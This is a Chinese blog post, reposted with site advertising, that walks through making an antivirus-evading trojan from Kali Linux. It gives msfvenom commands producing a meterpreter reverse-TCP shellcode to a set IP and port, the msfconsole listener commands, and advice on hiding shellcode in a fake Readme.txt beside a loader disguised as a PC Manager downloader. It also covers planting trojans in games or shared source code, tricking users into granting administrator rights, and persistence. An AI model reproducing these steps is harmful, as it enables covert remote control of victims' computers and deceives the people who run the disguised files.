kali制作安卓免杀木马_kali linux激活成功教程WiFi

kali制作安卓免杀木马_kali linux激活成功教程WiFishellcode超级免杀作者声明:本文章属于作者原创,不能转载,违反网络安全法自己承担.这里只供学习使用.日期:2019-12-31我试过了电脑管家,火绒安全,McAfee,360,但只有360使用手动云查杀时木马才能查出来(目前所有软件都无法查杀!!!!!2020-1-2)从2019-12-29日早上起,我向我的PE-tools工具里写了一个功能,就是shellcode注入功能,写…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

shellcode超级免杀

作者声明: 本文章属于作者原创,不能转载,违反网络安全法自己承担.这里只供学习使用.

日期: 2019-12-31

我试过了电脑管家,火绒安全,McAfee,360, 但只有360使用手动云查杀时木马才能查出来 (目前所有软件都无法查杀!!!!! 2020-1-2) 从2019-12-29日早上起,我向我的PE-tools工具里写了一个功能,就是shellcode注入功能,写好之后,发现虽然shellcode能注入,但是不能免杀,于是采用各种加密技巧,还是没能逃脱火绒,我绞尽脑汁的想,使用dll注入,dll注入虽然能逃脱免杀,payload反弹时,可是不能交互了.我就采用一种更笨的方法,就是程序运行时加载一下shellcode文件,试了一下成功免杀.好废话不多说,咱们开始!!!!

效果图

f269a3c4761b0cadbf090ae5b4e3df09.png

演示:

环境

Kali (攻击机)

Win10 (受害机 且安装有各种杀毒软件)

WinXp (辅助机,只是用来编译源码的)

如何免杀

免杀效果其实很简单,就是程序启动后加载文件动态运行里面写好的shellcode即可.

而且还方便替换shellcode不用编译,直接替换文本文件内容即可,且还可以伪装为Readme.txt文件

可以向Readme.txt乱填入一些声明,将shellcode进行排版,以防被发现..

可以借助一些软件进行编译你的加载器,修改图标即大小,让对方毫无怀疑…

生成shellcode:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c

lhost后面就是我本地的ip, lport后面时指定的一个端口号.指定好之后,会生成shellcode如下图:

aafa8a73080385b73a712dd07afe0fa1.png

将生成的shellcode复制粘贴到一个文件里,你也可以直接使用

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c > a.txt

那shellcode放在了a.txt文件中了,代开看也更上图一模一样.

写入shellcode:

得到shellcode之后,我先进行操作,涉及到加载器的源码,我会把它放在末尾来说:

使用我已经编译后的一个仿真电脑管家下载器,如图:

3a9b612201606a5cc8758936bc5d486b.png

一个文件是模拟电脑管家下载器的一个软件,是我编译好的一个文件,后面我会讲它的简单原理与制作

另一个 Readme.txt就是我们放置shellcode的文件

我向Readme.txt里写入了一些东西,可以让下载的人这东西只是用来声明的,如图

8278bcf3d353371f0a206c51c47e7b8d.png

使劲回车,然后将自己的shellcode复制到该文件.

6cb46ab06f51b41133b04fbecf3919df.png

这里我把shellcode藏在了该文件的底部,一般人它也只读前面,后面不会看,看到了也不知道那是啥玩意..

复制好之后,想方设法将这两个文件仍到你的目标,有很多方法,就不多说了..

实施攻击:

假如对方已经拿到了,该软件,如图:

2af6c90b32e51219e78965877466cd03.png

从这里可以知道,静态的反杀已经OK,昨天使用的各种加密手段,还是没能逃脱火绒的魔抓,这个方法还可以,看一下Readme.txt

ad62bc0b0f99652d13db06001ef6eaf7.png

往下拉看一下shellcode:

1dd9ef2f557867b3228358a82d8512f9.png

如果觉得shellcode太显眼,你可以对它进行base64加解密就行.

在kali中输入 msfconsole

进入之后如图:

86ca60e5b67d356605e2829373042373.png

依次输入以下命令

#msf5> use exploit/multi/handler

#msf5> set payload windows/meterpreter/reverse_tcp

#msf5> set lhost ip (这里填你的攻击机上的ip)

#msf5> set lport port (这里填生成shellcode时的端口)

#msf5> exploit -j (后台监听)

如图:

c3a31888405cf6b798b88e46b3e6281a.png

当对方点击QQPCDownload运行时即可得到shell.

5a797bdbca4bd1d7bdaab36c8ea20330.png

看到了一个session 开启了输入 session -i 1 (1就是开启号) 进行交互.输入sysinfo

5f6b1a6c5f993f8dbec90ed9914383a2.png

咱们使用火绒来边扫描边控制吧…

ade1428326a1bda69cb893a5020a1960.png

可以看到,完全杀不到…..好了演示结束,接下来就是讲讲加载器咋写吧.

加载器咋写:

根据网络安全法律,不公布

伪装

可以使用,extraicohs工具提取任意一个exe文件的图标,提取之后,在vc6中添加图标进行编译

然后再使用我开发的一个工具调整一下加载器的大小.

15f3d16390d667e5ba0c1e2611b7e8dd.png 我做了几个游戏,游戏里就包含了木马,然对方直接不知道这个有病毒.还有一种方式更加伪装. 分享啥啥源码,比如我做的一个贪吃蛇游戏,若对方得到源码,只要对方编译运行,即可中招.. 为了安全着想,我不分享我做的木马….,但原理我已经说了,十分简单.. 可以提取如图:

48522740f7843f95c20a0b0d977acdb1.png

使用Pe_tools增加大小, 如图:

14b52aad520c3733eb08dc9852915213.png

写入到c盘,若为win10电脑,写入到其他磁盘.

fd670292f90f46b5d57a9caf2fc3342a.png

实现可以控制任意一台中木马的电脑.

买一个服务器,选择debian,然后安装metasploit框架,既可以实现控制任意一台中木马的电脑….

如何获取管理员权限

侵入对方后,看一下他的安全软件,然后使用木马冒充安全软件,在开发木马时,设置一下运行的权限为管理员即可

然后运行该木马,这时就会出现一个管理员权限的请求,一般情况下,用户都很信任安全软件获取管理员权限,则点击是.

然后c盘随你玩了

如何设置后门

要想实现长期控制,就得给对方上传开机自的木马…,我已经做好了,且根据对方的杀毒软件做的一个白加黑.

杀毒软件和使用者毫无察觉,为了不让自己进局子,我不会发给别人..

源码下载 + 测试文件:

实验工具下载: https://files-cdn.cnblogs.com/files/lyxf/exploit.zip

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/171356.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • SQL聚合函数功能和用法解析

    SQL聚合函数功能和用法解析第一部分:介绍SUM和AVG  我们知道数据库通常包含大量数据,要从海量的数据中找到我们需要的某条记录无异于大海捞针,不过通过SQL语言我们可以找到很多方法从数据库中提取我们要查找的特定数据,就是通过这些方法我们才能找到“列举出七八两个月中购买了西伯利亚羊毛的所有顾客的姓名”这类问题的答案。  很多时候,我们还希望能够通过对数据进行分析,总结出规律和趋势或生成高水平的报表。例如,对于采购经理来说,…

  • SMBus学习记录

    SMBus学习记录SMBus学习记录SMBus是SystemManagementBus的缩写,译为系统管理总线,SMBus是一种二线制串行总线,1996年第一版规范开始商用。它大部分基于I2C总线规范。Overview系统管理总线(SMBus)是一个双线接口,通过它,各种系统组件芯片和设备可以相互通信,也可以与系统的其余部分进行通信。它基于I2C总线的工作原理。SMBus为系统和电源管理相关任务提供控制总线。系统可以使用SMBus将消息传递到设备和设备之间,而不使用单独的控制线。可减少引脚数。本文档描述了

    2022年10月26日
  • caffeine缓存应用场景_caffeinecacheload

    caffeine缓存应用场景_caffeinecacheload在本文中,我们来看看Caffeine—一个高性能的Java缓存库。缓存和Map之间的一个根本区别在于缓存可以回收存储的item。回收策略为在指定时间删除哪些对象。此策略直接影响缓存的命中率—缓存库的一个重要特征。Caffeine因使用WindowTinyLfu回收策略,提供了一个近乎最佳的命中率。填充策略(Population)Caffeine为我们提供了三种填充策略:手动、同步和异步手动加载(Manual)Cache<String,Object>

    2022年10月26日
  • 从ZERO开始系列:大数据软件之1.Hadoop的安装与wordcount运行

    从ZERO开始系列:大数据软件之1.Hadoop的安装与wordcount运行

  • 基于51单片机+LD3320语音模块+SYN6288语音合成——语音识别智能分类垃圾桶「建议收藏」

    基于51单片机+LD3320语音模块+SYN6288语音合成——语音识别智能分类垃圾桶「建议收藏」语音识别智能分类垃圾桶基本介绍器件51单片机LD3320语音模块SYN6288语音合成SG90舵机(4个)usb-ttl模块垃圾桶四个(4个)面包板(建议用)实现思路与接线实现流程图接线呈现图代码编写语音模块(部分代码)语音模块串口调试结果51单片机代码(部分代码 )项目展示基本介绍这个一个基于51单片机做的一个语音识别分类智能垃圾桶,通过我们说话来对垃圾词语进行分类。比如:垃圾桶(一级指令)易拉罐(垃圾词语),我们通过说话说出关键字让语音模块接收到——语音模块通过串口发指令给51单片机,针对

  • 查看sqlite_sqlite数据库手机版

    查看sqlite_sqlite数据库手机版这是什么用于SQLite的数据库浏览器(DB4S)是一种高质量,可视化的开源工具,用于创建,设计和编辑与SQLite兼容的数据库文件。DB4S适用于想要创建,搜索和编辑数据库的用户和开发人员。DB4S使用熟悉的类似电子表格的界面,并且不必学习复杂的SQL命令。控件和向导可供用户使用:创建并压缩数据库文件 创建,定义,修改和删除表 创建,定义和删除索引 浏览,编辑,添加和删除记录 搜索记录 导入和导出记录为文本 从CSV文件导入和导出表格 从/到SQL转储文件导入和导出数据库

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号